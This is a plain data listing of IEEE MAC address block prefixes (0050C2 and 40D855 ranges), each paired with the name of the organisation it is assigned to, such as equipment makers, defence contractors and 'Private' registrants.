0050C2591 Grosvenor Technology Ltd 0050C258F XoIP Systems Pty Ltd 0050C25C4 ProMik GmbH 0050C25B9 Taiwan Video & Monitor 0050C25B2 Syntronic AB 0050C25B1 Rosta Ltd 0050C25C5 Radiant Imaging, Inc. 0050C25AA Transenna AB 0050C259A MultiTrode Pty Ltd 0050C2562 C21 Systems Limited 0050C255F Moog Broad Reach 0050C2568 GeoFocus, LLC 0050C2565 WORKPOWER TECNOLOGIA ELETRONICA LTDA-EPP 0050C2563 ORTRAT, S.L. 0050C2564 Last Mile Gear 0050C2558 Bedo Elektronik GmbH 0050C2573 DATAMICRO Co., Ltd. 0050C257E Digital Way 0050C2575 SOLYSTIC 0050C2574 Ingeniería Almudí S.L. 0050C257F Orderite, Inc. 0050C254F Valtronic SA 0050C251B Beta Lasermike Ltd 0050C2534 Hyundai J. Comm 0050C2535 MMS Servis s.r.o. 0050C252A OMNITRONICS PTY LTD 0050C2529 Phytec Messtechnik GmbH 0050C2526 AC SYSTEMS, s.r.o. 0050C2538 EtherTek Circuits 0050C252D Smartcom-Bulgaria AD 0050C2541 WAVES SYSTEM 0050C253D Digital communications Technologies 0050C2516 SOWA ELECTRIC CO., LTD. 0050C24F5 Monroe Electronics, Inc. 0050C24F4 O2RUN 0050C24F1 Packet Island Inc. 0050C250B Logic Beach Inc 0050C2509 Hillcrest Laboratories, Inc. 0050C24FB BES Technology Group 0050C24FA Cambridge Technology, Inc. 0050C250F Polystar Instruments AB 0050C2502 Criterion Systems Limited 0050C24EB Mandozzi Elettronica SA 0050C24C6 Rubin Ltd. 0050C24C4 Black Diamond Video, Inc. 0050C24C3 Quantum3D, Inc. 0050C24C1 Movaz Networks, Inc. 0050C24BD Argon ST 0050C24BE Digital Dynamics, Inc. 0050C24AF Orbis Oy 0050C24AE ads-tec GmbH 0050C24E4 Embigence GmbH 0050C24BA Mistletoe Technologies 0050C24CB Verint Systems Ltd 0050C24D5 SEBA Design Pty Ltd 0050C247C AUCONET GmbH 0050C248E Teledyne Tekmar 0050C248F DENGYOSHA co.,LTD. 0050C248A Mobile Matrix, Inc. 0050C248B ads-tec GmbH 0050C248C UNITON AG 0050C24A0 Advanced technologies & Engineering (pty) Ltd 0050C249C Envisacor Technologies Inc. 0050C2476 Ascon S.p.a. 0050C2478 Metafix Inc. 0050C2477 SEV Tidsystem AB 0050C249F GCS, Inc 0050C2312 Dese Technologies SL 0050C2483 SES 0050C2494 Ultimate Technology, Inc. 0050C247F BRIT Inc. 0050C24A3 Protium Technologies, Inc. 0050C24A4 IEEE P1609 WG 0050C2442 Pico Computing, Inc. 0050C2444 Offshore Systems Ltd 0050C2445 MICRONIC s.r.o. 0050C2449 BLEILE DATENTECHNIK GmbH 0050C2441 Sammi Information Systems Co.,Ltd 0050C2472 KOP Ltd 0050C246F Neuroware 0050C243F ARVOO Imaging Products BV 0050C245C Deister Electronic GmbH 0050C245B Matra Electronique 0050C2457 Danbridge 0050C2463 Codem Systems, Inc. 0050C2420 Boundless Technologies 0050C2424 Metrolab Technology SA 0050C242E Oelmann Elektronik GmbH 0050C2411 Multimessage Systems Ltd. 0050C240B Center VOSPI JSC 0050C240A Contec Steuerungstechnik & Automation GmbH 0050C240D Afonics Fibreoptics Ltd 0050C2438 Telecom Protection Technologies Limited 0050C2431 Octatron, Inc. 0050C2415 SensoTech GmbH 0050C240F BIR,INC. 0050C2407 AIE Etudes 0050C2400 SmartMotor AS 0050C2402 Numeron Sp. z o.o. 0050C2425 Pinnacle Technology 0050C241F Avionica, Inc 0050C23DA M5 Data Limited 0050C23D5 Fluke Biomedical, Radiation Management Services 0050C23D2 Adilec Enginyeria SL 0050C23CE Ward Leonard Electric Company 0050C23ED The Board Room Inc. 0050C23E6 CRDE 0050C23E4 CUE, a.s. 0050C23DF BiODE Inc. 0050C23DB Osmetech Inc. 0050C23DD ELMIC GmbH 0050C23D7 TTC TELEKOMUNIKACE Ltd 0050C23FB nVent, Schroff GmbH 0050C23BD Bigbang L.T.D. 0050C23B4 Contrôle Analytique inc. 0050C23C1 MicroTek Electronics, Inc. 0050C23B1 Specstroy-Svyaz Ltd 0050C23AE Hankuk Tapi Computer Co., Ltd 0050C23AF Norbit ODM AS 0050C23B0 Microtarget Tecnologia Digital Ltda. 0050C239F Isensix 0050C238D A&G Soluzioni Digitali 0050C23A5 LabJack Corporation 0050C23A0 StreetFire Sound Labs, LLC 0050C234F North Pole Engineering, Inc. 0050C236B Minerva Technology Inc 0050C2365 VPG 0050C2369 Always On Wireless 0050C237E Ni.Co. S.r.l. 0050C237A IDA Corporation 0050C2387 Inoteska s.r.o. 0050C2382 Colorado vNet 0050C2341 Novx Systems 0050C2362 AZD Praha s.r.o. 0050C235D NetTest A/S 0050C2358 ALCEA 0050C2355 IHM 0050C2320 DTASENSOR S.p.A. 0050C2324 ODIXION 0050C232E MANUSA-GEST, S.L. 0050C233E CA Technology, Inc 0050C2334 Picture Elements, Inc. 0050C2335 Nimcat Networks 0050C2300 Soredex Instrumentarium Oyj 0050C231C Casa Systems Inc. 0050C22EA QUBIsoft S.r.l. 0050C22BD StorLink Semi 0050C22F9 Digilent Inc. 0050C22F5 ADChips 0050C22EE SHF Communication Technologies AG 0050C22F2 Eurotek Srl 0050C22B9 Richmond Sound Design Ltd. 0050C22B6 Softier Inc. 0050C22D5 PIXY AG 0050C22CB FACTS Engineering LLC 0050C22E4 iamba LTD. 0050C22DC Wiener, Plein & Baus GmbH 0050C22D7 Neo Electronics Ltd 0050C2292 AMIRIX Systems 0050C228F Spellman High Voltage Electronics Corp 0050C2290 EBNEURO SPA 0050C22A8 DVTel Israel Ltd. 0050C22B2 Smiths Detection 0050C2274 Fundación TECNALIA Research & Innovation 0050C2273 Servicios Condumex, S. A. de C. V. 0050C2265 BELIK S.P.R.L. 0050C225A Zendex Corporation 0050C2264 Confidence Direct Ltd 0050C2254 Thales Communications Ltd 0050C2285 Littwin GmbH & Co KG 0050C2282 Telvent 0050C2280 AGECODAGIS SARL 0050C2247 Gradual Tecnologia Ltda. 0050C224B Azimuth Systems, Inc. 0050C222D asetek Inc. 0050C2239 Stins Coman 0050C2251 DGT Sp. z o.o. 0050C2241 Contronics Automacao Ltda 0050C221A MST SYSTEMS LIMITED 0050C221E Applied Technologies Associates 0050C220A Ferrari electronic AG 0050C2216 Level Control Systems 0050C2215 VoiceCom AG 0050C220D Varisys Ltd 0050C2227 Intelligent Photonics Control 0050C2228 Intelligent Media Technologies, Inc. 0050C2222 imo-elektronik GmbH 0050C21FE Safetran Traffic Systems Inc. 0050C21F4 Covia, Inc 0050C21EF M2 Technology Pty Ltd 0050C21F6 BAE SYSTEMS Controls 0050C21CD INCAA Informatica Italia srl 0050C21D0 Yazaki North America, Inc. 0050C21DA GFI Chrono Time 0050C21D5 Redpoint Controls 0050C21C7 TWIN DEVELOPMENT S.A. 0050C21C2 Weltronics Corp. 0050C21C0 WillMonius Inc. 0050C21C1 InfinitiNetworks Inc. 0050C21A8 ANOVA BROADBAND 0050C21AF PESA Inc. 0050C219E Paltronics, Inc. 0050C2183 Mixbaal S.A. de C.V. 0050C2185 Optical Wireless Link Inc. 0050C2181 Task 84 Spa 0050C2180 Zultys Technologies 0050C21A1 Portalplayer, Inc 0050C218A Basler Electric Company 0050C219B Wilcoxon Research, Inc. 0050C2197 EPM Tecnologia e Equipamentos 0050C217E Binary Wave Technologies Inc. 0050C217B Broadstorm Telecom 0050C2179 Verifiber LLC 0050C217C Jeffress Engineering Pty Ltd 0050C2146 APCON, Inc. 0050C2013 Sensys Technologies Inc. 0050C2001 JMBS Developpements 0050C2000 T.L.S. Corp. 0050C2018 CAD-UL GmbH 0050C2153 Advanced Devices SpA 0050C2152 AirVast Technology Inc. 0050C215B Dune Networks 0050C215C Aoptix Technologies 0050C2145 ELC Lighting 0050C2147 UniSUR 0050C215D Cepheid 0050C2141 Time Terminal Adductor Group AB 0050C2142 Instrumeter A/S 0050C2130 U.S. Traffic Corporation 0050C212D Megisto Systems, Inc. 0050C2125 Tecwings GmBh 0050C2135 ELAD SRL 0050C212B Dong A Eltek Co., Ltd. 0050C213D Formula One Management Ltd. 0050C213F Sentito Networks 0050C2116 DSP Design, Ltd. 0050C2115 Vidco, Inc. 0050C211F CSS Industrie Computer GmbH 0050C211B Digital Vision AB 0050C211C Stonefly Networks 0050C2117 Wintegra Ltd. 0050C20F9 Raven Industries 0050C210D Implementa GmbH 0050C20FD Inducomp Corporation 0050C2105 Lumentis AB 0050C2103 Green Hills Software, Inc. 0050C20E6 RouteFree, Inc. 0050C20E7 Century Geophysical Corp. 0050C20E2 Visual Circuits Corp. 0050C20F4 Sysnet Co., Ltd. 0050C20DC Elbit Systems Ltd. 0050C20C6 Advanced Medical Information Technologies, Inc. 0050C20C5 SAIA Burgess Controls AG 0050C20CD LINET OY 0050C20CB STUDIEL 0050C209E Infinitec Networks, Inc. 0050C20A0 CYNAPS 0050C2098 EPEL Industrial, S.A. 0050C20A4 Bounty Systems Pty Ltd. 0050C208A Rising Edge Technologies 0050C2096 Utronix Elektronikutreckling AB 0050C2092 DigitAll World Co., Ltd 0050C2078 Reselec AG 0050C207C PLLB elettronica spa 0050C2067 Riverlink Computers, Ltd. 0050C206A Unimark 0050C206C WaveCom Electronics, Inc. 0050C2071 NetVision Telecom 0050C2073 Alstom Signalling Ltd. 0050C2042 B.E.A.R. Solutions (Australasia) Pty, Ltd 0050C2041 Damler Chrysler Rail System (Signal) AB 0050C203F Celotek Corp 0050C2049 Computer Concepts Corp 0050C2046 Private 0050C2034 Ing. Buero W. Kanis GmbH 0050C202B Nova Engineering Inc. 0050C202E Turtle Mountain Corp 0050C2030 Lockheed Martin Tactical Defense Systems Eagan 0050C2022 Ashling Microsystems Ltd. 0050C2023 Zabacom, Inc. 0050C201C Tadiran Scopus 0050C2008 Portable Add-Ons 0050C20BF Private 0050C22FA Tornado Modular Systems 0050C2689 RF Code 0050C2B04 Ubiquiti Inc 0050C2D1F Olympus NDT Canada 0050C21C9 modas GmbH 0050C2769 BES GmbH 0050C20B4 Wavefly Corporation 0050C2DC6 Fluid Components Intl 40D855019 Nautel LTD 0050C2DFD Wotbox ltd 0050C2FD9 Figment Design Laboratories 40D85502A Tinkerforge GmbH 0050C2059 Austco Marketing & Service (USA) ltd. 0050C20F1 Steelcase Inc. 40D855163 KMtronic ltd 40D85510D Rite-Tech Industrial Co., Ltd. 0050C224D Mettler Toledo 0050C2AB5 Mettler Toledo 0050C292D APProSoftware.com 0050C2065 Clever Devices 0050C29F4 FSR, INC. 0050C2255 STMicroelectronics SRL 0050C2AD6 Unisensor A/S 0050C2C7B Honeywell 0050C2D95 Honeywell 0050C2EA8 MB connect line GmbH Fernwartungssysteme 0050C2624 Comtest Networks 40D8550CE EST Analytical 0050C2083 ard sa 0050C2CEC Erhardt+Leimer GmbH 0050C2453 Erhardt+Leimer GmbH 0050C22E2 Ballard Technology, Inc, 0050C2D88 T+A elektroakustik GmbH & Co.KG 0050C2913 Leonardo UK Ltd 0050C23DE ABB Power Technologies S.p.A. Unità  Operativa SACE (PTMV) 0050C2FBD EATON FHF Funke + Huster Fernsig GmbH 0050C2379 Control LAN S.A. 0050C2FD4 Insitu, Inc 40D85517C Critical Link LLC 0050C2339 Secure Systems & Services 0050C2777 Euro Display Srl 0050C2AB4 n3k Informatik GmbH 0050C22C0 Magellan Technology Pty Limited 0050C28AD Thales Communications Inc 0050C2A48 Thales UK Limited 0050C289A Neptune Technology Group Inc. 0050C267C Gogo BA 0050C27CE Gogo BA 0050C2EAF Gogo BA 40D85500B Gogo BA 0050C2F8F Computerwise, Inc. 0050C20B5 EXTREME COPPER, INC. 0050C2E98 i3 International Inc. 0050C2C63 Potter Electric Signal Co. LLC 0050C29DF CODEC Co., Ltd. 0050C2DE6 Fr. Sauter AG 0050C2F14 VISION SYSTEMS AERONAUTIC 0050C2C0A ABB Transmission and Distribution Automation Equipment (Xiamen) Co., Ltd. 0050C2E3A Vocality International Ltd 0050C22DA PYRAMID Computer GmbH 0050C24B1 NSFOCUS Information Technology Co., Ltd. 0050C2403 Rohde&Schwarz Topex SA 40D85500C Aplex Technology Inc. 0050C2E6A Aplex Technology Inc. 0050C2E00 Aplex Technology Inc. 0050C2DAB Aplex Technology Inc. 0050C21F3 Radionor Communications 0050C242F Win4NET 0050C242C Trapeze Software Group Inc 0050C233D GD Mission Systems 0050C2CC4 GD Mission Systems 0050C24DE GD Mission Systems 0050C2BB7 GD Mission Systems 0050C22F7 GILLAM-FEI S.A. 0050C2FDC QUERCUS TECHNOLOGIES, S.L. 0050C213B Vaisala Oyj 0050C2217 Linn Products Ltd 0050C260D Sicon srl 0050C2330 Sicon srl 40D85507C Agramkow Fluid Systems A/S 0050C2149 Haag-Streit AG 0050C25CC Enseo, Inc. 0050C2060 Private 0050C2D9B Intuitive Surgical, Inc 0050C2BA0 txtr GmbH 0050C212C DELTA TAU DATA SYSTEMS, INC. 0050C21EB Data Respons A/S 0050C2378 Daintree Networks Pty 0050C222A Crescendo Networks 40D855071 TATTILE SRL 0050C2BE4 Grupo Epelsa S.L. 0050C2857 Grupo Epelsa S.L. 0050C27AA Grupo Epelsa S.L. 0050C25F8 Grupo Epelsa S.L. 0050C256A Grupo Epelsa S.L. 40D855027 Grupo Epelsa S.L. 0050C2B51 Aeroflex GmbH 40D855131 EMAC, Inc. 0050C28E3 bioMérieux Italia S.p.A. 40D855EE6 Narinet, Inc. 40D8551E0 Embedded Technology Corporation 40D8551E3 Mega Electronics Ltd 40D8551DD BaOpt Benelux bv 40D8551D1 Founder Broadband Network Service Co.,Ltd. 40D8551D3 Kaluga Teletypes Manufacturing Plant 40D8551CC NKT Photonics A/S 40D8551CA Rigel Engineering 40D8551C5 Private 40D8551A5 DemoPad 40D8551AD WICHER DIGITAL TECHNIK 40D8551B9 Beking Industrieele automatisering 40D85517E TOKHATEC 40D855173 Contec Steuerungstechnik & Automation GmbH 40D855167 Assembly Contracts Ltd 40D855169 Photop Koncent 40D855185 Standard Change Makers 40D855189 Yoozma Corporation 40D855188 Array Corporation 40D855177 TRI Engineering co.,ltd. 40D855171 Sicon srl 40D855158 Exibea AB 40D855157 Hitachi Power Solutions Co., Ltd. 40D855160 Thermo Fisher Sceintific 40D855164 NFT Automatisierungssysteme GmbH 40D85514C PLT 40D855153 BlinkPipe Ltd 40D85510B So-Cool Corporation. 40D855114 GD Mission Systems 40D855134 digitech GmbH & Co. KG 40D85512D Biotage Sweden AB 40D855126 TTI LTD 40D855132 AeroVision Avionics, Inc 40D855101 e.p.g. Elettronica Srl 40D8550E5 Triton Electronics LTD 40D8550D8 NEXT! s.c. S.Piela B.Dryja 40D8550DB Top Connect OU 40D8550F7 Comline Elektronik Elektrotechnik GmbH 40D8550EC Sentry 360 Security 40D8550D3 LECO Corporation 40D8550AA Thermal Imaging Radar, LLC 40D8550A4 Resch Electronic Innovation GmbH 40D8550C5 M.M. Elektrolab 40D8550C1 Xepto Computing Inc 40D8550C2 SC Techswarm SRL 40D85509A CoherentPlus Sdn Bhd 40D855084 Papendorf Software Engineering GmbH 40D85507B IPS Technology Limited 40D855068 Oki Seatec Co., Ltd. 40D855051 CS Instruments Asia 40D855050 ATG UV Technology 40D85504B Vital Tech Industria e Comercio Ltda 40D85505D Leica Biosystems 40D855058 Energy Team S.p.A. 40D85505C Rosslare Enterprises Limited 40D85504C Serveron Corporation 40D855064 HIPODROMO DE AGUA CALIENTE, S.A. DE C.V. 40D85502E Circuitec Ind. Equip. Eletr. Ltda 40D855041 T.Q.M. Itaca Technology s.r.l. 40D85501D Scharco Elektronik GmbH 40D855016 Par-Tech, Inc. 40D855035 Mesotech International, Inc. 40D85503A Socus networks 40D85503B Telcomkorea 40D855009 ClearSite Communications Inc. 0050C2FE0 Azurtest 0050C2FD6 City Computing Ltd 0050C2FFE Sensata Technologies 0050C2FF8 KST technology 0050C2FF6 Booyco Electronics 0050C2FD3 Aster Electric Co.,Ltd. 0050C2FCF DINTEK Shanghai Electronic Ltd 0050C2FCE KOYO ELECTRIC 0050C2FA3 Xemex NV 0050C2FA2 Power-One 0050C2FC7 SERCOM Regeltechniek 0050C2FC4 Kyowadensi 0050C2FB9 Coral Telecom Ltd 0050C2F96 JLCooper Electronics 0050C2F7F Dynamic Design 0050C2F7D D-Hike Electroncs Technology Co.,Ltd 0050C2F79 Tattile srl 0050C2F7B MCM Electronics 0050C2F9F Nanjing SAC Power Grid Automation Co., Ltd. 0050C2F8C UBSTechnology Co., Ltd 0050C2F8B comlet Verteilte Systeme GmbH 0050C2F86 Audio Power Labs 0050C2F84 Dynon Instruments 0050C2F78 Gets MSS S.A. 0050C2F73 DELTACAST.TV 0050C2F5B Saia-Burgess Controls AG 0050C2F5D SMARTB TECHNOLOGIES 0050C2F51 NDC Infrared Engineering, Inc. 0050C2F49 Green Instruments A/S 0050C2F4E Heinzinger electronic GmbH 0050C2F43 Special Systems Engineering Center LLC 0050C2F40 iBWorld co.,ltd. 0050C2F68 Newtec A/S 0050C2F65 Telebyte Inc. 0050C2F0E Micro Technic A/S 0050C2F01 Mango DSP, Inc 0050C2F00 Syscom Instruments 0050C2F06 Micro-Key BV 0050C2F03 Wren Sound Systems 0050C2F21 SEITEC Co. Ltd 0050C2F32 Net4Things 0050C2F2C Terratel Technology s.r.o. 0050C2ED3 ECO MONITORING UTILITY SYSTEMS LTD 0050C2ED4 TAMAGAWA ELECTRONICS CO.,LTD. 0050C2ED2 Klangspektrum GmbH 0050C2EFD Sanmina 0050C2EDC Eyelock Corporation 0050C2EF6 Netline Communication Technologies 0050C2EF4 RO.VE.R. Laboratories S.p.A 0050C2EF0 Homaetrix Ltd 0050C2EDF Monitor Business Machines 0050C2EEB fibrisTerre GmbH 0050C2EE9 QUANTA S.r.l. 0050C2ED7 FBT Elettronica spa 0050C2ED6 Cat AB 0050C2EE5 Cytec Zylindertechnik GmbH 0050C2EB0 Pulse Communication Systems Pvt. Ltd. 0050C2EAB Warp9 Tech Design, Inc. 0050C2EC1 ANT Group s.r.l 0050C2EC0 UgMO Technologies 0050C2EA2 ThinkRF Corp 0050C2EA0 Robert Bosch Healthcare Systems, Inc. 0050C2EC9 Amsterdam Scientific Instruments BV 0050C2E9D nicai-systems 0050C2E99 UV Networks, Inc. 0050C2E9A Solace Systems 0050C2E96 PROYECSON S.A. 0050C2E93 Perceptive Pixel Inc. 0050C2EBF CIVOLUTION 0050C2EB5 Covidence A/S 0050C2EAA BAE Systems 0050C2E90 GS Elektromedizinische Geraete G. Stemple GmbH 0050C2E91 DSP DESIGN LTD 0050C2E8E GD Mission Systems 0050C2E61 Detech Electronics ApS 0050C2E84 ABB Transmission and Distribution Automation Equipment (Xiamen) Co., Ltd. 0050C2E7A Lightel 0050C2E71 traffic network solutions s.l 0050C2E6F Leyden Engineering 0050C2E88 Pivitec, LLC 0050C2E68 Kyoritsu Electric Corporation 0050C2E47 ENIKA.CZ 0050C2E42 Wings for Media SL 0050C2E31 ENSIS Co., Ltd. 0050C2E5D T8 Ltd 0050C2E2E DS! Ingenieurbuero 0050C2E1A Rosslare Enterprises Limited 0050C2E1F ELVEES 0050C2E17 Gall Tankdatensysteme GmbH 0050C2E01 Tyco Traffic & Transportation 0050C2DFE Xitek Design Limited 0050C2DF5 EtherLight 0050C2E05 NOCOSIUM 0050C2E04 Sec.Eng Systems Pty Ltd 0050C2DD2 Electronic Applications, Inc. 0050C2DCE Mecsel Oy 0050C2DE2 SEQUTEC INC 0050C2DDC Vision & Control GmbH 0050C2D9C Gamber Johnson LLC 0050C2DBD Margento R&D 0050C2DB8 Comsat VertriebsgmbH 0050C2D99 T-Industry, s.r.o. 0050C2D91 CHAUVIN ARNOUX 0050C2DAF eumig industrie-tv GmbH 0050C2DAA M & PAUL, INC 0050C2D73 Saia-Burgess Controls AG 0050C2D6E BC Illumination, Inc. 0050C2D6C ALPHA Corporation 0050C2D6B Nemec Automation 0050C2D56 SELEX Communications Limited 0050C2D55 Sterna Security 0050C2D52 F+D Feinwerk- und Drucktechnik GmbH 0050C2D82 Audio Authority Corp 0050C2D83 Blankom 0050C2D7D Voltech Instruments 0050C2D7F HMI Technologies 0050C2D5B Infinition Inc. 0050C2D60 Nihon Kessho Koogaku Co., Ltd. 0050C2D5E PRIVATECH Inc. 0050C2D66 Uvax Concepts 0050C2D7B OWITA GmbH 0050C2D7A Transbit Sp. z o.o. 0050C2D75 Collectric AB 0050C2D76 Telvent 0050C2D74 Computech International 0050C2D3D Tellabs Operations Inc. 0050C2D3B Gitsn Inc. 0050C2D1B TECHKON GmbH 0050C2D49 Smith Meter, Inc 0050C2D45 Technagon GmbH 0050C2D44 Saia-Burgess Controls AG 0050C2D0E Weinert Engineering GmbH 0050C2D41 AREA ENERGY, INC. 0050C2D39 Apex NV 0050C2CEF Lupatecnologia e Sistemas Ltda 0050C2CFC Tritium Pty Ltd 0050C2CE5 Maretron, LLP 0050C2D00 Bodensee Gravitymeter Geosystem GmbH 0050C2CBF Megacon AB 0050C2CDE Axotec Technologies GmbH 0050C2CA0 Kiefer technic GmbH 0050C2CAD Pacific Coast Engineering 0050C2CAC PURVIS Systems Incorporated 0050C2CB2 Moravian Instruments 0050C2CB0 Konsmetal S.A. 0050C2CB5 Private 0050C2CB7 inotech GmbH 0050C2CA5 YOKOWO CO.,LTD 0050C2C8F Keith & Koep GmbH 0050C2C8D Emergency Message Controls LLC 0050C2C80 Reko-vek 0050C2C67 Practical Control Ltd 0050C2C54 HPC Platform 0050C2C52 Smartfield, Inc. 0050C2C4F Powersense A/S 0050C2C7C Keysight Technologies Inc. 0050C2C79 CODESYSTEM Co.,Ltd 0050C2C5D SweMet AB 0050C2C5A Commotive A/S 0050C2C49 Elektronic Thoma GmbH 0050C2C76 GridManager A/S 0050C2C72 Quail 0050C2C13 Dantec Dynamics A/S 0050C2C11 ART Antriebs- und Regeltechnik GmbH 0050C2C41 COMPRION GmbH 0050C2C3E Sysacom 0050C2C3B ELEKTRO-AUTOMATIK GmbH & Co. KG 0050C2BFE Ingeteam Paneles S.A.U. 0050C2C26 Austco Marketing & Service (USA) ltd. 0050C2C22 Audient Ltd 0050C2C39 SECAD SA 0050C2C32 Procon Electronics 0050C2C19 Ibercomp SA 0050C2C1A SAM Co., Ltd. 0050C2C1B Graesslin GmbH 0050C2C16 OMICRON electronics GmbH 0050C2C31 4D Technology Corporation 0050C2C2C bach-messtechnik gmbh 0050C2C0B ProSourcing GmbH 0050C2BC0 Galaxia Electronics 0050C2BBC ImpactSystems 0050C2BBE Onlinepizza Norden AB 0050C2BB9 Toptech Systems, Inc. 0050C2BB3 ClimateWell AB (publ) 0050C2BB2 St Michael Strategies Inc 0050C2BEF SOCIEDAD IBERICA DE CONSTRUCCIONES ELECTRICAS, S.A. (SICE) 0050C2BEB Peek Traffic Corporation 0050C2BCE TV Portal Co., Ltd. 0050C2BC9 Nextmove Technologies 0050C2BD4 Global Security Devices 0050C2B73 ARKRAY, Inc. Kyoto Laboratory 0050C2B8C Keith & Koep GmbH 0050C2B8D CEMSI 0050C2B88 Gigatronik Köln GmbH 0050C2B85 SilverNet 0050C2B81 GHL Advanced Technolgy GmbH & Co. KG 0050C2B7F Enatel 0050C2B70 Nisshin Electronics co.,ltd. 0050C2B6C Drinelec 0050C2BA7 RaumComputer Entwicklungs- und Vertriebs GmbH 0050C2B7A Schnoor Industrieelektronik GmbH & Co. KG 0050C2B28 Micromax Pty. Ltd. 0050C2B26 Elko Systems 0050C2B66 8185 0050C2B5E Palgiken Co.,Ltd. 0050C2B4C ElectroCom 0050C2B47 MCS MICRONIC Computer Systeme GmbH 0050C2B3F M-Tronic Design and Technology GmbH 0050C2B4F Sencon UK Ltd. 0050C2B34 Meisol co.,ltd 0050C2B0D Japan Electronics System, Inc 0050C2B1D Telegenix 0050C2B1B Integrated Control Corp. 0050C2B18 Rosslare Enterprises Limited 0050C2AF2 ACD Elektronik GmbH 0050C2AF1 Green Goose 0050C2B00 Saia-Burgess Controls AG 0050C2AD1 Phytec Messtechnik GmbH 0050C2ACB U-CARE INC. 0050C2AE0 AT4 wireless.S.A 0050C2AC5 E-Motion System, Inc. 0050C2AB9 Showtacle 0050C2AB2 ProCom Systems, Inc. 0050C2A86 LIMAB AB 0050C2A7B Orange Tree Technologies 0050C2A93 SPX Flow Technology 0050C2A94 Par-Tech, Inc. 0050C2AA7 Endeas Oy 0050C2A68 X-Pert Paint Mixing Systems 0050C2A66 DVTech 0050C2A99 Haivision Systems Inc 0050C2A9A Absolutron. LLC 0050C2A96 FEP SRL 0050C2AA0 Smith Meter, Inc. 0050C2A20 Quorum Technologies Ltd 0050C2A1E MAMAC Systems, Inc. 0050C2A1F Flight Data Systems Pty Ltd 0050C2A1D SAMH Engineering Services 0050C2A50 i-RED Infrarot Systeme GmbH 0050C2A4F Deuta GmbH 0050C2A4E Conduant Corporation 0050C2A25 Saia-Burgess Controls AG 0050C2A17 Winners Satellite Electronics Corp. 0050C2A14 Elbit Systems of America - Tallahassee Operations 0050C2A15 Industrial Computing Ltd 0050C2A4A DITRON S.r.l. 0050C2A45 Sofradir-EC 0050C2A5F Alga Microwave Inc 0050C2A39 Industrial Data Products Ltd 0050C2A09 Innovative American Technology 0050C29FE SPECTRA EMBEDDED SYSTEMS 0050C29D0 J. DITTRICH ELEKTRONIC GmbH & Co. KG 0050C29CA ESAB-ATAS GmbH 0050C29CE Ronan Engineering 0050C29C8 ethermetrics 0050C29E0 DST Swiss AG 0050C2A00 Technovare Systems 0050C29FC ECTEC INC. 0050C2A0F Visualware Inc 0050C29FA Teranex A Division of Silicon Optix 0050C29F5 Commex Technologies 0050C29E6 Kumho Electric, Inc. 0050C2984 Atel Corporation 0050C2985 Earnestcom Sdn Bhd 0050C29AD Chronos Technology Ltd. 0050C29AA TEKO TELECOM SpA 0050C29A6 Metodo2 0050C29B8 Sound Player Systems e.K. 0050C29B3 Kahler Automation 0050C29B1 Bon Hora GmbH 0050C299C CaTs3 Limited 0050C299F Sietron Elektronik 0050C29A3 Computerwise, Inc. 0050C299B Bettini srl 0050C2981 Novotronik GmbH 0050C297E RF Industries 0050C2977 Saia-Burgess Controls AG 0050C2997 Depro Électronique 0050C2996 Commercial Timesharing Inc. 0050C2975 Pyramid Technical Consultants 0050C29A4 Entwicklung Hard- & Software 0050C2955 Roessmann Engineering 0050C2947 IMEXHIGHWAY cvba 0050C2967 Watthour Engineering Co., Inc. 0050C2969 Gehrke Kommunikationssysteme GmbH 0050C296E Peek Traffic Corporation 0050C293E RCS Communication Test Systems Ltd. 0050C2941 Rolbit 0050C290F INTEGRA Biosciences AG 0050C290E Phytec Messtechnik GmbH 0050C291D Rosendahl Studiotechnik GmbH 0050C292F Phytec Messtechnik GmbH 0050C2933 Saia-Burgess Controls AG 0050C2906 Gidel 0050C2902 China Railway Signal & Communication Corp. 0050C28D7 Polygon Informatics Ltd. 0050C28D8 Array Technologies Inc 0050C28D2 TTi Ltd 0050C28DE Coherix, Inc 0050C28DC Frame Systems Limited 0050C28EC Balfour Beatty Rail GmbH 0050C28ED AT-Automation Technology GmbH 0050C28E6 Sandel Avionics, Inc. 0050C28EE PCSC 0050C28CC LyconSys GmbH & Co.KG 0050C28C4 Soldig Industria e Comercio de Equipamentos Eletronicos LTDA 0050C28C6 Gradual Tecnologia Ltda. 0050C28C1 Heraeus Noblelight GmbH 0050C289E Broadcast Electronics 0050C2896 Blankom 0050C2894 Shockfish SA 0050C2890 BAE Systems Hägglunds AB 0050C287F Optoelettronica Italia S.r.l. 0050C287B UAVNavigation S.L. 0050C287A Spectrum Management, LC 0050C286F b-plus GmbH 0050C286B OMB Sistemas Electronicos S.A. 0050C28B4 Sandar Telecast AS 0050C28B3 VTQ Videtronik GmbH 0050C28AB Nanomotion Ltd. 0050C288A Continental Electronics Corp. 0050C284B TASK SISTEMAS DE COMPUTACAO LTDA 0050C2867 Syntronics 0050C2864 ATG Automatisierungstechnik GERA GmbH 0050C2860 Eutron S.p.A. 0050C2853 Ettus Research LLC 0050C2850 K.K. Rocky 0050C285D Ing. Knauseder Mechatronik GmbH 0050C2844 Prodigy Electronics Limited 0050C2840 Residential Control Systems 0050C283B O. Bay AG 0050C2833 LaserLinc, Inc. 0050C281C Telcom 0050C281B Brain Tech Co., Ltd 0050C2816 Intelight Inc. 0050C2817 Odin TeleSystems Inc 0050C280A Phytec Messtechnik GmbH 0050C27FC TIS Dialog LLC 0050C2808 ITB CompuPhase 0050C2804 SoftSwitching Technologies 0050C27F8 Wise Industria de Telecomunicações Ldta. 0050C27F7 MangoDSP 0050C2822 Winner Technology Co, Ltd. 0050C281E Channelot Ltd. 0050C27E5 Nystrom Engineering 0050C27E3 Progentech Limited 0050C27E0 C&D Technologies, Inc 0050C27C7 Pyrosequencing AB 0050C27C5 Venture Research Inc. 0050C27D3 Highrail Systems Limited 0050C27C0 European Industrial Electronics B.V. 0050C27BD PROMATE ELECTRONIC CO.LTD 0050C27BC EIDOS SPA 0050C27C9 Bluebell Opticom Limited 0050C27BA Infodev Electronic Designers Intl. 0050C27B8 Design 2000 Pty Ltd 0050C277F ACD Elektronik GmbH 0050C2798 Indefia 0050C2799 AAVD 0050C2795 Ameli Spa 0050C2792 SMARTRO Co.,Ltd. 0050C27A4 Calibre UK LTD 0050C27A2 RaySat Israel LTD 0050C277C ATEC SRL 0050C277A Smith Meter, Inc 0050C279A JMC America, LLC 0050C27B3 Elmec, Inc. 0050C27B4 T 1 Engineering 0050C276F Control and Robotics Solutions 0050C2770 Cadex Electronics Inc. 0050C2759 Sequentric Energy Systems, LLC 0050C2762 Assembly Contracts Limited 0050C275F B. Rexroth the identity company GmbH 0050C275E Sky-Skan, Incorporated 